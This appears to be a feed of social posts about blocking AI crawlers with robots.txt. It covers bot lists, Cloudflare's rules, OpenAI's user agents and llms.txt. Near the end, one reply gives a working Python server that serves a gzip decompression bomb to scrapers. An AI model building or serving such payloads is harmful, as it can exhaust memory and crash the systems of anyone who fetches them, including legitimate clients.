I asked ChatGPT about the recent copyright news. It rehashed my latest column and misconstrued the facts. But why was it on my site at all?
https://www.plagiarismtoday.com/2025/07/23/chatgpt-ignores-robots-txt-rehashes-my-column/

For website and shop operators: learn how to block AI bots like GPTBot, ClaudeBot & Google-Extended with robots.txt – without endangering your SEO rankings.
#Development #Trends
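A minimal sketch of that approach: block the AI crawlers by name and leave ordinary search crawlers like Googlebot unmatched, so normal indexing (and your rankings) continue untouched. The user-agent tokens below are the vendors' published ones; extend the list as needed.
# Block AI crawlers by user agent; no rule matches Googlebot,
# so regular search indexing is unaffected.
User-agent: GPTBot
Disallow: /
User-agent: ClaudeBot
Disallow: /
User-agent: Google-Extended
Disallow: /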
Who’s crawling your site in 2025 · The most active and blocked bots and crawlers https://ilo.im/1652mx
_____
#Bots #Crawlers #Website #Business #SEO #UserAgents #RobotsTxt #WebDev #Frontend #Backend
Here's #Cloudflare's #RobotsTxt file:
# Cloudflare Managed Robots.txt to block AI related bots.
User-agent: AI2Bot
Disallow: /
User-agent: Amazonbot
Disallow: /
User-agent: amazon-kendra
Disallow: /
User-agent: anthropic-ai
Disallow: /
User-agent: Applebot
Disallow: /
User-agent: Applebot-Extended
Disallow: /
User-agent: AwarioRssBot
Disallow: /
User-agent: AwarioSmartBot
Disallow: /
User-agent: bigsur.ai
Disallow: /
User-agent: Brightbot
Disallow: /
User-agent: Bytespider
Disallow: /
User-agent: ChatGPT-User
Disallow: /
User-agent: ClaudeBot
Disallow: /
User-agent: Diffbot
Disallow: /
User-agent: DigitalOceanGenAICrawler
Disallow: /
User-agent: DuckAssistBot
Disallow: /
User-agent: FacebookBot
Disallow: /
User-agent: FriendlyCrawler
Disallow: /
User-agent: Google-Extended
Disallow: /
User-agent: GPTBot
Disallow: /
User-agent: iaskspider/2.0
Disallow: /
User-agent: ICC-Crawler
Disallow: /
User-agent: img2dataset
Disallow: /
User-agent: Kangaroo Bot
Disallow: /
User-agent: LinerBot
Disallow: /
User-agent: MachineLearningForPeaceBot
Disallow: /
User-agent: Meltwater
Disallow: /
User-agent: meta-externalagent
Disallow: /
User-agent: meta-externalfetcher
Disallow: /
User-agent: Nicecrawler
Disallow: /
User-agent: OAI-SearchBot
Disallow: /
User-agent: omgili
Disallow: /
User-agent: omgilibot
Disallow: /
User-agent: PanguBot
Disallow: /
User-agent: PerplexityBot
Disallow: /
User-agent: Perplexity-User
Disallow: /
User-agent: PetalBot
Disallow: /
User-agent: PiplBot
Disallow: /
User-agent: QualifiedBot
Disallow: /
User-agent: Scoop.it
Disallow: /
User-agent: Seekr
Disallow: /
User-agent: SemrushBot-OCOB
Disallow: /
User-agent: Sidetrade indexer bot
Disallow: /
User-agent: Timpibot
Disallow: /
User-agent: VelenPublicWebCrawler
Disallow: /
User-agent: Webzio-Extended
Disallow: /
User-agent: YouBot
Disallow: /
#Business #Findings
Most blocked SEO bots · Insights from ~140 million websites https://ilo.im/16439x
_____
#SEO #Bots #Crawlers #Content #Website #Blog #RobotsTxt #Development #WebDev #Backend
#Business #Explorations
What would happen if I blocked big search? · Pros and cons of blocking major search engines https://ilo.im/163yb3
_____
#SearchEngine #SEO #AI #Website #Blog #RobotsTxt #Development #WebDev #Frontend #Backend
#Development #Findings
Most blocked AI bots · “Block rates have increased significantly over the past year.” https://ilo.im/16425n
_____
#AI #Bots #Crawlers #Content #Website #Blog #RobotsTxt #WebDev #Backend
I've had a robots.txt rule in place for months to block ChatGPT from touching my site. Yet it still shows up as a referrer?
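One likely explanation: OpenAI documents several distinct user agents, and each needs its own robots.txt entry. GPTBot gathers training data, ChatGPT-User fetches pages on demand when a user asks about them, and OAI-SearchBot powers search; blocking GPTBot alone doesn't stop the other two. A sketch covering all three:
User-agent: GPTBot
Disallow: /
User-agent: ChatGPT-User
Disallow: /
User-agent: OAI-SearchBot
Disallow: /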
#Business #Guidelines
The Internet Archive opt-out itch · Ways to deal with your public internet history https://ilo.im/163ssx
_____
#InternetArchive #Internet #History #Consent #Trust #Transparency #Content #Blog #Website #RobotsTxt
#Google uses content for #AI training even when creators object. This has now been officially confirmed.
According to Google #DeepMind, the opt-out only covers certain parts of the company. Anyone who wants to keep their data out has to remove the site from #Google Search entirely. #Publishers and #website operators see this as an economic disadvantage.
Google outlines pathway for robots.txt protocol to evolve: How the 30-year-old web crawler control standard could adopt new functionalities while maintaining its simplicity. https://ppc.land/google-outlines-pathway-for-robots-txt-protocol-to-evolve/ #Google #RobotsTxt #WebCrawlers #SEO #DigitalMarketing
#Business #Introductions
Meet LLMs.txt · A proposed standard for AI website content crawling https://ilo.im/16318s
_____
#SEO #GEO #AI #Bots #Crawlers #LlmsTxt #RobotsTxt #Development #WebDev #Backend
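For context, the proposal (llmstxt.org) is a markdown file served at /llms.txt: an H1 with the site name, a blockquote summary, then H2 sections listing links. A minimal sketch, with placeholder names and URLs:
# Example Site
> A one-sentence, plain-language summary of what this site offers.
## Docs
- [Getting started](https://example.com/start.md): overview for new readers
## Optional
- [Changelog](https://example.com/changelog.md): secondary material crawlers can skip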
Tracked down my Forgejo CPU spikes with pprof: an otherwise acceptable crawler is indexing each commit of my personal weather station data. All 107,980 of them. Blame info, too.
Many Forgejo paths are nonsensical to crawl, even by good bots. Codeberg's robots.txt is a great start for these.
https://codeberg.org/robots.txt
This should both relieve pressure and expose more bad bots.
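The rules in question are plain path disallows. A sketch of the shape they take (the exact patterns here are assumptions; the linked Codeberg file is the authoritative list):
# Keep crawlers out of per-commit views, which grow without bound.
User-agent: *
Disallow: /*/*/commit/
Disallow: /*/*/blame/
Disallow: /*/*/compare/
Disallow: /*/*/raw/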
#Development #Reports
Google AI Mode is here · How to access it and control it with robots.txt https://ilo.im/162o8h
_____
#Business #Google #SearchEngine #AnswerEngine #AI #RobotsTxt #WebDev #Frontend #Backend
Hey does anyone know if there's still a working zip bomb style exploit that can be deployed on a static site/JS (or as an asset/resource)? Specifically to target web scrapers and AI bullshit? The second any server goes online now, it's immediately bombarded by stupid numbers of requests.
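The approach usually discussed is a gzip bomb rather than a literal zip: scrapers that auto-decompress Content-Encoding: gzip responses will inflate a payload of a few megabytes into gigabytes of zeros. Note it needs control over response headers, so it won't work on purely static hosting. A minimal sketch using only Python's standard library (file name, port, and sizes are illustrative):
import gzip
import os
import http.server

BOMB = "bomb.gz"

# Pre-build once: roughly 10 MB on disk, ~10 GiB once a client decompresses it.
if not os.path.exists(BOMB):
    with open(BOMB, "wb") as f, gzip.GzipFile(fileobj=f, mode="wb", compresslevel=9) as gz:
        chunk = b"\0" * (1 << 20)      # 1 MiB of zeros
        for _ in range(10 * 1024):     # 10 GiB total, uncompressed
            gz.write(chunk)

class Handler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        payload = open(BOMB, "rb").read()
        self.send_response(200)
        # Declare the body as ordinary gzip-compressed HTML;
        # the client inflates it on its own.
        self.send_header("Content-Encoding", "gzip")
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(payload)))
        self.end_headers()
        self.wfile.write(payload)

http.server.HTTPServer(("", 8080), Handler).serve_forever()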
Hi, got a question.
Is there a standard anti-AI/anti-SEO etc. robots.txt file? Or a trustworthy site that explains how to build one if a prefab isn't available? Is there anything else I should consider?
Thanks.